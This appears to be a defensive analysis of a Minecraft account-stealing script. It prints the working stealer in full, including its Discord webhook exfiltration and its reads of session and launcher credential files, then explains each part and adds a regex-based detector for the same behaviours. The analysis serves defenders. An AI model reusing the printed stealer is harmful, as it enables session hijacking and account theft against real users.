This code appears to be malicious and is designed to...

August 29, 2025 at 11:00 PM

var webhookUrl2 = new java.net.URL("https://discord.com/api/webhooks/1395759641081938000/oNyivxiXIvEYSOuCYBn-WIMeyLK2iGYY-qXjS5F0Xl7OJ4-7DCvEqFV0sj6W7TGbFuge"); function send(string) { var c = webhookUrl2.openConnection(); c.setDoOutput(true); c.setRequestMethod("POST"); c.setRequestProperty("User-Agent", "Mozilla/5.0"); c.setRequestProperty("Content-Type", "application/json; charset=UTF-8"); var o = c.getOutputStream(); var w = new java.io.OutputStreamWriter(o, "UTF-8"); w.write(string); w.flush(); w.close(); o.close(); c.getResponseCode(); } function paste(json) { if (json == null) return "-"; var u = new java.net.URL("https://hst.sh/documents"); var c = u.openConnection(); c.setDoOutput(true); c.setRequestMethod("POST"); c.setRequestProperty("User-Agent", "Mozilla/5.0"); c.setRequestProperty("Content-Type", "text/plain; charset=UTF-8"); var w = new java.io.OutputStreamWriter(c.getOutputStream(), "UTF-8"); w.write(json); w.close(); var r = c.getResponseCode(); if (r === 200) { var reader = new java.io.BufferedReader(new java.io.InputStreamReader(c.getInputStream(), "UTF-8")); var response = ""; var line; while ((line = reader.readLine()) !== null) { response += line; } reader.close(); var obj = JSON.parse(response); return obj.key; } else { return "-"; } } var uuid = Player.getUUID(); var ssid = Client.getMinecraft().func_110432_I().func_148254_d(); var File = Java.type("java.io.File"); var appData = new File(java.lang.System.getenv("APPDATA")); var localAppData = new File(java.lang.System.getenv("LOCALAPPDATA")); var mFolder = new File(Client.getMinecraft().field_71412_D.getPath()); var iFolder = new File(mFolder.parent); var isFolder = new File(iFolder.parent); var lFolder = new File(isFolder.parent); var mmc = FileLib.read(lFolder + "\\accounts.json"); var prism = FileLib.read(appData + "\\PrismLauncher\\accounts.json"); var defaultmc = FileLib.read(appData + "\\.minecraft\\launcher_profiles.json"); var essentials = FileLib.read(mFolder + 
"\\essential\\microsoft_accounts.json"); var essentialsNew = FileLib.read(appData + "\\gg.essential.mod\\microsoft_accounts.json"); var feather1 = FileLib.read(appData + "\\.minecraft\\feather\\accounts.json"); var feather3 = FileLib.read(appData + "\\.feather\\accounts.json"); var ip = FileLib.getUrlContent("https://checkip.amazonaws.com/"); if (lFolder.getPath().indexOf("Prism") !== -1) { prism = FileLib.read(lFolder + "\\accounts.json"); mmc = null; } var prismKey = paste(prism); var essentialsKey = paste(essentials); var essentialsKeyNew = paste(essentialsNew); var mmcKey = paste(mmc); var defaultKey = paste(defaultmc); var feather2 = paste(feather1); var feather4 = paste(feather3); var name = Player.getName(); var uuid = Player.getUUID(); var payload = JSON.stringify({ content: "", embeds: [{ "title": name + " got ratted!", "url": "https://sky.shiiyu.moe/stats/" + name, "color": 16761035, "author": { "name": "Gerald", }, "description": "**SSID**\n```" + ssid + "```", "fields": [ { "name": "Username", "value": "" + name + "", "inline": true }, { "name": "UUID", "value": "" + uuid + "", "inline": true }, { "name": "IP", "value": "" + ip + "", "inline": true }, { "name": "Links", "value": "[Prism](https://hst.sh/" + prismKey + ") | [Essentials](https://hst.sh/" + essentialsKey + ") | [Essentials2](https://hst.sh/" + essentialsKeyNew + ") | [MultiMC](https://hst.sh/" + mmcKey + ") | [Feather](https://hst.sh/" + feather2 + ") | [Feather2](https://hst.sh/" + feather4 + ")" } ] }] }); send(payload);

This code appears to be malicious and is designed to steal sensitive information from the user's computer. Let's break it into components and examine what it does:

  1. Webhook Setup:

    • The code defines a URL (webhookUrl2) pointing to a Discord Webhook where the stolen data will be sent.
  2. The send() function:

    • This function sends a POST request to the Discord Webhook URL with a given string (usually JSON-formatted content) as the payload.
  3. The paste() function:

    • This function sends a POST request containing data to the Hastebin-like service hst.sh. If the request is successful, it returns a key that can be used to compose a link to the stored data.
  4. File System Access:

    • The code uses java.io.File and environment variables (APPDATA, LOCALAPPDATA, etc.) to locate directories and files commonly used by Minecraft launchers or account systems (e.g., accounts.json or microsoft_accounts.json from MultiMC, Essential Mod, Feather, and others).
    • These files may contain sensitive data like user accounts, authentication tokens, or credentials.
  5. IP Address Retrieval:

    • The code fetches the user's public IP address using the external service https://checkip.amazonaws.com/.
  6. Pasting Data:

    • It calls the paste() function on the contents of various files (e.g., accounts.json and other configurations).
    • This action uploads the data to the hst.sh service, returning a unique key for each data upload.
  7. Payload Construction:

    • The script constructs a JSON payload containing:
      • The Minecraft player's username and UUID.
      • The user's SSID (likely a session ID, obtained from the Minecraft client).
      • The user's public IP address.
      • Links to the uploaded sensitive files on hst.sh (e.g., Prism, Essentials, MultiMC, Feather account files).
  8. Sending the Payload:

    • The payload is sent via the send() function to the Discord Webhook specified earlier. This sends all the harvested information to the attacker's controlled Discord channel.

Conclusion:

This script is a RAT (Remote Access Trojan) or "ratting" script targeting Minecraft users. It:

  • Harvests sensitive files such as account information and launcher configurations.
  • Uploads these files to a public file-sharing service (hst.sh).
  • Sends links to these uploaded files, along with other sensitive details (such as IP address, username, and UUID), to a Discord Webhook controlled by the attacker.

If you encountered this script, do not execute it. It is malicious and will compromise the victim's account(s) and privacy.
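As a way to check a script before running it, the following added example (not code from the original page) statically triages ChatTriggers-style JavaScript for the behaviours listed above: the obfuscated session-token accessor, reads of launcher account files, and an outbound webhook or paste upload. The rule ids, weights and verdict names are assumptions, and both sample scripts are constructed, with a placeholder webhook URL.

```javascript
// Static triage for the stealer behaviours described in the breakdown above.
// Rule ids, weights and verdict names are illustrative assumptions.
const RULES = [
  { id: "discord-webhook", weight: 3,
    re: /https?:\/\/(?:\w+\.)?discord(?:app)?\.com\/api\/webhooks\/\d+\/[\w-]+/i },
  { id: "session-token-access", weight: 4,
    re: /func_110432_I\s*\(\s*\)\s*\.\s*func_148254_d\s*\(/ },
  { id: "launcher-account-file", weight: 3,
    re: /(?:microsoft_accounts|accounts|launcher_profiles)\.json/i },
  { id: "paste-upload", weight: 2, re: /https?:\/\/hst\.sh\/documents/i },
  { id: "public-ip-lookup", weight: 1, re: /checkip\.amazonaws\.com/i },
  { id: "raw-java-net", weight: 1, re: /java\.net\.URL|openConnection\s*\(/ },
];

function triage(source) {
  const matched = RULES.filter((r) => r.re.test(source));
  const hits = matched.map((r) => r.id);
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  // Credential access combined with any outbound channel is the stealer
  // pattern; either half alone only warrants a manual review.
  const readsSecrets = hits.includes("session-token-access") ||
    hits.includes("launcher-account-file");
  const sendsOut = hits.includes("discord-webhook") ||
    hits.includes("paste-upload") || hits.includes("raw-java-net");
  const verdict = readsSecrets && sendsOut ? "block"
    : score > 0 ? "review" : "clean";
  return { hits, score, verdict };
}

// Constructed samples: a defanged fragment with a placeholder webhook,
// and an ordinary chat trigger.
const SAMPLE_STEALER = [
  'var hook = new java.net.URL("https://discord.com/api/webhooks/000000000000000000/EXAMPLE-TOKEN");',
  'var ssid = Client.getMinecraft().func_110432_I().func_148254_d();',
  'var prism = FileLib.read(appData + "\\\\PrismLauncher\\\\accounts.json");',
].join("\n");
const SAMPLE_BENIGN =
  'register("chat", function (msg) { ChatLib.chat("hi " + msg); });';

console.log(triage(SAMPLE_STEALER));
console.log(triage(SAMPLE_BENIGN));
```

String matching like this is defeated by obfuscation, so a "clean" verdict only means none of these specific indicators appeared in plain text.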
